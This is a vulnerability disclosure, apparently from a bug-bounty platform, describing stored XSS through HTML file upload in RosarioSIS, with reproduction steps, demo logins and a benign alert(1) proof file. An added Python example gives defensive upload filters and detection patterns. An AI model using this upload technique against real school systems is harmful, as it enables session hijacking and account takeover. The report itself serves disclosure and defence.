Cross-site Scripting (XSS) - Stored via HTML file upload in francoisjacquet/rosariosis
Reported on Apr 26th 2022
Description
RosarioSIS is vulnerable to stored XSS through the file upload in Assignments: a student can upload an HTML file containing JavaScript, and when a teacher later opens the submission the file is served from the application's own origin, so the script executes in the teacher's session.
Proof-of-Concept
phish.html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>Test Upload File</title>
</head>
<body>
<h1>Test upload</h1>
<script>alert(1)</script>
</body>
</html>
Steps to reproduce
From the attacker's side (student)
1. Log in to the demo environment with the student account (student/student)
2. In the left menu, go to GRADES -> Assignments
3. Click on the "Add and subtract" assignment
4. Click Choose file and upload the phish.html file above
5. Click on SUBMIT ASSIGNMENT
From the victim's side (teacher)
1. Log in to the demo environment with the teacher account (teacher/teacher)
2. In the left menu, go to GRADES -> Grades
3. Click on the student "Student S Student" (student)
4. Click View online in the Submission column
5. Click on the Download link: the uploaded HTML is served and rendered in the application's origin, and the embedded script executes (alert(1) is shown)
Impact
Because the uploaded file is served from the application's origin, any script inside it runs with the viewing teacher's session. A low-privileged student account can therefore redirect the teacher to a phishing page or, where the session cookie is readable by script, steal that cookie and use it to gain unauthorized access to the teacher's account.
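The report shows the bug from the attacker's side; the two server-side controls that close this class of bug are shown below as an added example. This is illustrative Python, not RosarioSIS code (the project is written in PHP), and it makes no claim about what the linked fix commit actually changed. The extension allow-list, the "active content" deny-list and the header set are assumptions chosen for the example; the sample input is the report's own phish.html embedded as bytes. The point the example makes beyond the report: blocking html/htm/xhtml by extension alone is not enough, since a browser also sniffs the first bytes of a file, so the upload check also inspects content, and the download handler forces an attachment so that nothing stored is ever rendered in the application's origin.

```python
import os
import re

# Added example, not RosarioSIS code. Demonstrates the two controls that close this class of bug:
# reject browser-renderable uploads, and serve whatever is stored as a download, never inline.

# Allow-list of extensions a submission may carry (constructed for this example; the project's
# real list, if any, is not reproduced here).
ALLOWED_EXTENSIONS = {"pdf", "txt", "doc", "docx", "odt", "png", "jpg", "jpeg", "gif", "zip"}

# Extensions browsers render as a document in the serving origin. Denied outright, so that an
# accidental addition to ALLOWED_EXTENSIONS cannot reopen the hole (covers the htm/xhtml variants
# the reporter filed separately).
ACTIVE_CONTENT_EXTENSIONS = {"html", "htm", "xhtml", "xht", "shtml", "svg", "xml", "mht", "mhtml"}

# Markers in the leading bytes that make a browser treat the file as markup regardless of its name.
_ACTIVE_MARKERS = re.compile(
    rb"<\s*(?:!doctype\s+html|html|script|svg|iframe|object|embed)\b"
    rb"|javascript:"
    rb"|\bon[a-z]+\s*=",
    re.IGNORECASE,
)

# The PoC file from the report, embedded as sample input for this example.
PHISH_HTML = (
    b"<!DOCTYPE html>\n<html>\n<head>\n<meta charset=\"utf-8\"/>\n"
    b"<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\"/>\n"
    b"<title>Test Upload File</title>\n</head>\n<body>\n<h1>Test upload</h1>\n"
    b"<script>alert(1)</script>\n</body>\n</html>\n"
)


def file_extension(filename):
    """Return the last extension, lower-cased: 'phish.pdf.HTML' -> 'html', 'README' -> ''."""
    base = os.path.basename(filename.replace("\\", "/"))
    if "." not in base:
        return ""
    return base.rsplit(".", 1)[1].lower()


def is_upload_allowed(filename, content):
    """Accept only allow-listed extensions whose leading bytes do not look like markup or script."""
    ext = file_extension(filename)
    if not ext or ext in ACTIVE_CONTENT_EXTENSIONS or ext not in ALLOWED_EXTENSIONS:
        return False
    # Browsers sniff roughly the first KiB; a .txt that opens with <html or <script is rejected too.
    return _ACTIVE_MARKERS.search(content[:1024]) is None


def download_headers(stored_name):
    """Response headers that force a download and stop the browser executing the file's content."""
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", os.path.basename(stored_name.replace("\\", "/")))
    return {
        "Content-Type": "application/octet-stream",  # do not echo a client-supplied MIME type
        "Content-Disposition": 'attachment; filename="%s"' % safe_name,
        "X-Content-Type-Options": "nosniff",  # no sniffing back to text/html
        "Content-Security-Policy": "default-src 'none'; sandbox",  # defence in depth if rendered anyway
    }


if __name__ == "__main__":
    for name in ("phish.html", "phish.htm", "phish.xhtml", "phish.pdf.HTML", "homework.txt"):
        verdict = "accepted" if is_upload_allowed(name, PHISH_HTML) else "rejected"
        print(name, "->", verdict)
    print(download_headers("phish.html"))
```

Run stand-alone, every name above is rejected for the PoC content (the .txt because of the content check, the rest by extension), while a genuine plain-text submission named homework.txt passes. The download headers are what the "View online" / Download path should send for any stored submission, whatever the upload filter lets through.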
Hi @maintainer,
First of all, thank you for confirming my report.
Along with this, I also reported to you two more reports related to the upload function (xhtml and htm).
I see that your fix above has also covered these two extensions.
My two reports are here:
Report 1
Report 2
So based on the fix that you committed, I hope that you also validate those two reports by confirming the same fix commit like in this report (https://github.com/francoisjacquet/rosariosis/commit/90842ca1d30e2a3d52bcef024032f25d445c0edd).
Thank you a lot!